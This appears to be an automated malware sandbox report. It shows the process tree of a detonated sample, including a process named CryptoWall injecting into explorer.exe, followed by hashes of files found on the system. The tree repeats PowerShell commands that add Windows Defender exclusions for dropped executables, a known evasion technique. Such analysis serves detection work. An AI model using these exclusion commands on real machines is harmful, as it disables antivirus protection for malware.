                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '8.exe'
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                              PID:7760
                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                              PID:9056
                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                PID:2376
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\7.exe"
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                              • Drops startup file
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              PID:4048
                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7.exe'
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                PID:7188
                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '7.exe'
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                PID:7848
                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                PID:8476
                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                  PID:9464
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\6.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\6.exe"
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                • Drops startup file
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                PID:4260
                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\6.exe'
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                  PID:7888
                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '6.exe'
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                    PID:8892
                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                      PID:9084
                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                        PID:8784
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\5.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\5.exe"
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                                                      • Drops startup file
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      PID:4316
                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\5.exe'
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                        PID:10104
                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '5.exe'
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                          PID:2716
                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                            PID:6504
                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                            PID:9880
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\4.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\4.exe"
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                                                          • Drops startup file
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          PID:1424
                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\4.exe'
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                            PID:10144
                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '4.exe'
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                            PID:7892
                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                              PID:9504
                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                PID:9392
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\3.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\3.exe"
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                                              • Drops startup file
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              PID:216
                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\3.exe'
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                PID:7192
                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '3.exe'
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                PID:7504
                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                PID:5488
                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                  PID:8248
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\2.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\2.exe"
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                                • Drops startup file
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                PID:1484
                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2.exe'
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                  PID:8044
                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '2.exe'
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                  PID:5304
                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                  PID:7076
                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                  PID:6836
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\1.exe"
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                                • Drops startup file
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                PID:4272
                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1.exe'
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                    PID:8076
                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '1.exe'
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                      PID:9116
                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                        PID:5132
                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                          PID:9436
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\CryptoWall.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\CryptoWall.exe"
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                      PID:2604
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                        "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                        • Drops startup file
                                                                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                        PID:1904
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                          -k netsvcs
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                          PID:2800
                                                                                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:9952
                                                                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:6896
                                                                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:9488
                                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:8740
                                                                                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:7244
                                                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:6596
                                                                                                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:7596
                                                                                                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:10112
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                    PID:8212
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\Taskmgr.exe
                                                                                                                                                                                                                                                    "C:\Windows\SysWOW64\Taskmgr.exe"
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                    PID:7888
                                                                                                                                                                                                                                                • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                  PID:4052
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\Jbrja.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\Jbrja.exe -auto
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  PID:608
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\Jbrja.exe
                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\Jbrja.exe -acsi
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • Drops file in Drivers directory
                                                                                                                                                                                                                                                    • Sets service image path in registry
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                    • Suspicious behavior: LoadsDriver
                                                                                                                                                                                                                                                    PID:4568

                                                                                                                                                                                                                                                Network

                                                                                                                                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                                                                Downloads

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\duplicate.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  2KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  842a95557e911d5fa5dc2993be4f89a3

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  7a920c556e2e0d891e12131fc79f89b3bf9d1d92

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  6b2c41b6c72bbaf6aadffde0be3701dc38eef2b64ef60c68218ddd9178d0a56f

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  97f0ffe8958034d003eae896a6f6e5673d5447214dd145e98bef11b099e06b3df91638ff42e86e5db3038f6265292cd8a077dbd82dc5305c79bbff08ba6cbde9

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\aic_file_icons_retina_thumb.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  51KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  4eab279ff85ae91635b437108ea7a98d

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  984e3718bcbed4df087cd51b395b7f27beaf3765

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  1ba9ca2b56ac1ea4531e23f4b274ae63dee89775238c1f7e4b6efd49d8670655

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  c87a0620f1305a9e93b468b0f7f2965145cdd5f4f73b3f7f76f0351559abd9c5cf37771923e48bd6c9b45dfce3b3bc6ac990231d7b5afb3f0495099a3f440ac7

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\remove.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  ebd867c0d96c6eea4e745b779b453a0d

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  103bf3c1b494c6b19257176935b8040a9573f8db

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  ad6dd82b6cdb789081fb2ee63972a568ac956b7db58e5c4379bbcb4d9206896f

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  8a5f4b5e03474c0d7e4f3f98bc1daa57243c705704cf6c0e9bb862e813e6cb72157ff091decc1a74ec6f5059092d8cad4b5102ae17f58fca350c29550c3e654d

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_backarrow_default.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  cbe8fdf9f0019762af82ab529d96dc70

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  7e541c519e9122861f210e5acd0e881779955783

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  1165291147788add0de83614ccffeda15c5c07104c36ed88c507ef542bb19fff

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  32dc6ca48e544db7169b6376a480407a0379e892f54c32a5ae4b684bd58b6876a27d3b3fecf6cf90b211dc86b86d16792b76c6df8da620d1601a959db3a13fe7

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_closereview_18.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  a9258f0cd3f586fecfbc580204ba61d8

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  2b8d6623b77b72b3ebee5d4bd947af5cd76b71dc

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  6af0ed42bca15cdd3974419933942e942e891bc5cd1f73407ba27f1f126f2d4d

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  6612f07ce3d425c454717c03df8a36fbf79a673cea79278066626f940a6ec151b73ff06007bf5ffe89a8c2335809cf4c03bb37aba1394dd511b829f10e3a6755

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_comment_18.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  bcd3cebd7b56b92af504ba1bfb0af9e6

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  11d8304b002040720b3277b66b08b8bd69fb8e8d

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  a22597012f005efa0938566fa9d77eb7ab4e3f465a67fa50d6e994e9f30f4e0c

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  162649875fae623a8b1e65749e09548f316cb33c738930c43384ef13188c524fd436ebee1e36170a66ce4e4949f900cf5096a768f7ee597d1b6dd05186d64e19

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_editpdf_18.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  fe55018760b39ff07e1967d70135bf89

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  e0bc881501409170ce2e4288f622826cde5f4725

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  02ab7366dd96b8f5c08c305f3a901a8370bb1b0297d1160d5ad3ea1ad2756452

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  7fb01f204f6ae2c7a9b5542e51e8b09de3f3259cb2f27010cd0c43bf4189c0dbf76c6d1c8417908f3bc9f24e26d8ba133ab821a0e98114ca5de556410dfceaeb

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_export_18.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  877af1369aa0af819afb654fe3c196fd

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  b415f89b27563e359c0e0633e95134ef4af024aa

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  ac7c363d2524315a1cb735d75caaf7652fa44d0f4d4551e6f6999e9607b38226

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  9823f75981289f341c41d887c13da1e3bfd8c149e9702f456b0523783ae93e7facac831c155b9fa041d26aa81e5762107393dace81d2670a425e67c1a99979d2

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_fillandsign_18.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  2KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  025ccc5304ba2147a2066c2a5a7c3199

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  81e65bf3d743599f6178431c96f49db915fd6ad6

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  e54a0db239bf5c094e95e6624672002b0a9ac023f9cc948b5d3a9ce2d1ed21c9

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  ae517bcb6df6b33c75430806cc39d568fe9f62f280e1461df762d3418f9aebe221498a39d54523dd571a09cabe9fe1e04c87c42ce7ac4fd4b8b4b86c74ba9f4d

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_move_18.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  393a32470bb9cc90103661dc50a10c17

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  e6b38a86e718936af13de0a08d11e9a010c2cb79

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  7358a2e7d8f38a2dfa498e004ae8dec36d479d8b96c62d89c6252062060dffc5

